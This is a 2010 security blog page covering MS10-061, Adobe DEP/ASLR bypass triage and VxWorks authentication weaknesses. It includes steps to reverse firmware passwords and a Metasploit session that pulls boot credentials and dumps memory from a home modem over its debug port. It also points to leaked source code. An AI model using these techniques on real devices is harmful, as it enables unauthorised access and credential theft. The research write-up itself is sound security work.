As usual, Microsoft Patch Tuesday has been interesting this month.
MS10-061 flaw strikes the Spooler service, and seems to have been exploited by the infamous StuxNet worm.
So, has it been "0day" (as many people tend to believe - like Kostya) ? (no offense man ;)
I let you read that press article from Hakin9 magazine, issue n°4/2009 - you can start reading at the bottom of page #29.
PS. For those of you who can read French, this article has also been quoted at the end of my "most viewed (and commented)" blog post. Hidden gem :)
Friday, September 17, 2010
Tuesday, September 14, 2010
Rapid publishing on recent Adobe flaws
"As usual", Adobe products (namely Adobe Reader and Flash Player) were recently targeted by "0day" attacks in the wild.
I did not have a look at the attacks myself, but several trusted sources (such as H. D. Moore) described the exploit as "great" because it is able to bypass DEP and ASLR on Windows Seven.
Various exploitation tricks have been detailed on blogs such as Metasploit and VUPEN. ASLR bypass mostly relies on a library (namely "icucnv36.dll") not being ASLR-compatible and always being loaded at its preferred base address.
Now to the point: for years, I have been using LookingGlass tool for preliminary triage before any application audit. It has been flying under the radar, but it works really great, and it is Open Source compiled in .NET bytecode.
Here is the result for an up-to-date Adobe Reader 9.3.4. It looks like there are still avenues for DEP/ASLR bypass :)
Wednesday, September 01, 2010
Follow-up on VxWorks issue
Introduction
As a follow-up to H. D. Moore research on VxWorks, I would like to share some personal thoughts on the matter.
I happen to have some experience with VxWorks, since this operating system used to be quite popular among broadband modem manufacturers. And I have always been fascinated by those SpyBoxes.
VxWorks software is now easier to get ahold of, since trial/evaluation software is readily available. However, by the time of VxWorks 5 (and older), things were a bit more tricky.
HDM pointed out that VxWorks source code leaked on PUDN Web site. As a rule of thumb, most of the world intellectual property is available from the Chinese Internet. However there are many other ways to browse the source (warning: all links below might disappear from the Internet without warning).
- Universities and student projects [1]
- Training courses [1]
- VxWorks enthusiasts [1] [2] [3]
- Third-party SDKs (for systems that have been built on the top of VxWorks) [1]
- Hardware hackers [1]
In the end, whatever you are looking for, Internet has it :)
Authentication
Now let's have a look at VxWorks authentication mechanism (described here and here).
Quoting usrConfig.c:
Quoting usrConfig.c:
(…)
loginInit (); /* initialize login table */
shellLoginInstall (loginPrompt, NULL); /* install security program */
/* add additional users here as required */
loginUserAdd (LOGIN_USER_NAME, LOGIN_PASSWORD);
}
#endif /* INCLUDE_SECURITY */
printLogo (); /* print out the banner page */
printf (" ");
printf ("CPU: %s. Processor #%d.\n", sysModel (), sysProcNumGet ());
printf (" ");
printf ("Memory Size: 0x%x.", sysMemTop () - (char *)LOCAL_MEM_LOCAL_ADRS);
printf (" BSP version %s.\n\n", bspVersion ());
(…)
Authentication is optional – #INCLUDE_SECURITY must be defined at compile time.
By default, loginUserAdd() must be called for creating each user account dynamically - there is no user/password "file" (since there might be no filesystem at all on the target system).
Password is "encrypted" using a VxWorks-proprietary algorithm. Quoting http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html:
"Q: How can I create (encrypted) passwords?
A: You can use vxencrypt that comes with Tornado to create passwords, but it is pretty weak.
I think it is sum( p[i] * i ^ i )) * 0x1e3a1d5 converted to ascii with a munged hex character set (presumably to make you think there are more than 2^32 encrypted passwords). I think I could reverse that using pen and paper."Therefore it is possible to log into any VxWorks 5 system in default configuration, given the following steps:
- Grab a copy of the firmware (more about this later)
- Find the banner printing code
- Look a few opcodes before - you will presumably find call(s) to loginUserAdd().
- Reverse passwords (using pen and paper ;)
Practical use case
Let's take the Trio3C broadband modem that has been widely distributed by Neuf Telecom a few years ago. This model has been superseded by the NeufBox4, and you could find second-hand modems for less than 5 euros nowadays. Trio3C appears to be running under VxWorks 5, and to have remote debugging enabled.
$ ./msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 584 exploits - 297 auxiliary
+ -- --=[ 219 payloads - 27 encoders - 8 nops
=[ svn r10182 updated today (2010.08.29)
msf| use auxiliary/scanner/vxworks/wdbrpc_bootline
msf auxiliary(wdbrpc_bootline)| set RHOSTS 192.168.1.1/32
RHOSTS =| 192.168.1.1/32
msf auxiliary(wdbrpc_bootline)| run
[*] 192.168.1.1: VxWorks5.4.2 Centillium Palladia 4K
[*] 192.168.1.1: BOOT: tffs=0,0(0,0)host:/tffs/vxworks.s e=192.168.1.4:0xffffff00 h=192.168.1.10 u=p220 pw=p220
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wdbrpc_bootline)| use auxiliary/admin/vxworks/wdbrpc_memory_dump
msf auxiliary(wdbrpc_memory_dump)| set RHOST 192.168.1.1
RHOST =| 192.168.1.1
msf auxiliary(wdbrpc_memory_dump)| set LPATH /tmp/memory.dmp
LPATH =| /tmp/memory.dmp
msf auxiliary(wdbrpc_memory_dump)| run
[*] Attempting to dump system memory...
[*] 192.168.1.1 Connected to VxWorks5.4.2 - Centillium Palladia 4K ()
[*] Dumping 0x00fef800 bytes from base address 0x80000000 at offset 0x00000000...
[*] [ 00 % ] Downloaded 0x00000b18 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:11 +0200 2010)
[*] [ 00 % ] Downloaded 0x000010a4 of 0x00fef800 bytes (complete at Sun Aug 29 09:55:34 +0200 2010)
(...)
[*] Dumped 0x00fefba0 bytes.
[*] Auxiliary module execution completed
The complete memory dump decompiles cleanly in IDA Pro [*] (base ROM address is kindly provided by the debugger).
Unfortunately for the demo, it appears that no hardcoded account is to be found. User accounts and (cleartext) passwords are stored within a configuration file. But that was a fun exercise anyway :)
[*] Actually not, I had to request a patch for the MIPS processor module :)
Unfortunately for the demo, it appears that no hardcoded account is to be found. User accounts and (cleartext) passwords are stored within a configuration file. But that was a fun exercise anyway :)
Subscribe to:
Posts (Atom)
